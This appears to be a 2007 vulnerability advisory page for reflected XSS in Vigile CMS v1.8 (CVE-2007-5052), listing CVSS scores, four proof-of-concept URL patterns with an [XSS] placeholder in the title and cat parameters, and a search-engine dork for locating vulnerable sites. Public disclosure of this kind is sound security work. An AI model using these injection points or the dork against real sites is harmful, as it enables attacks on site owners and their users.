Vigile CMS v1.8 Multiple Remote XSS Vulnerability

2007.09.24

Credit: x0kster

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-5052

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

# Name : Vigile CMS v1.8 Multiple Remote XSS Vulnerability
# Download : http://www.itcms.it/
# Date : 20-09-2007
# Author : x0kster
# Mail : x0kster (at) gmail (dot) com [email concealed]
# Note : For works, the wiki or the download module must be installed in the site.
#
# PoCs :
#
# Wiki 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&title=[XSS]
# Wiki 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[WIKINAME]?title=[XSS]
# Download 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[DOWNLOADNAME]&cat=[XSS]
# Download 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[DOWNLOADNAME]/cat=[XSS]
#
#
# Dork : "tutti i contenuti, notizie, e commenti sono anche opera degli utenti, ogni violazione sar? eliminata dietro segnalazione."

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Vigile CMS v1.8 Multiple Remote XSS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.